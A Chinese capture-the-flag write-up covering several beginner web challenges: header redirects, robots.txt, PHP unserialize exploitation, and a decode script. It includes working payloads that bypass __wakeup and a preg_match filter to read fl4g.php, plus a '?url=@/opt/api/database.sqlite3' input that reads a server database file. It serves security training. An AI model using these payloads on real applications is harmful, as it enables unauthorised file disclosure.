文章讲述了在使用BabyPHP时遇到的一个安全挑战,涉及如何通过反序列化过程绕过`__wakeup`魔术方法,从而访问隐藏的`flag`。解题过程中利用了构造函数、析构函数和字符串操作技巧。
babyphp
目录跳转
输入index.php会自动跳转到1.php
直接抓包
在头部看见flag
location:重定向
Training-WWW-Robots
访问robot.txt(君子协议
访问浏览器禁止访问的
拿到flag
unserialize3
根据题目提示,可以看出这是道反序列化的题
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}}
?code=补全代码,看见有一个魔术方法__wakeup,此方法会在反序列化后执行,退出并返回bad requests
绕过__wakeup即可得flag
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
O:5:"xctf":1:{s:4:"flag";s:3:"111";}
php unserianize
绕过wakeup
绕过正则匹配
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a=new Demo('fl4g.php');
$b= serialize($a);
echo $b ;//O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$var = new Demo('fl4g.php');
$var = serialize($var);
$var = str_replace('O:4', 'O:+4',$var);//绕过preg_match
$var = str_replace(':1:', ':2:',$var);//绕过wakeup
var_dump($var);//string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
var_dump(base64_encode($var));#显示base64编码后的序列化字符串
//string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="
?>
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
web2
解密脚本:
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=base64_decode(strrev(str_rot13($miwen)));
//echo $miwen;
$m=$miwen;
for($i=0;$i<strlen($m);$i++){
$_c=substr($m,$i,1);
$__=ord($_c)-1; # 字符转数字,在减1
$__=chr($__); # 数字转字符
$_=$_.$__; # 拼接字符串
}
echo strrev($_); # 反转字符串
cat
?url=@/opt/api/database.sqlite3
331
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
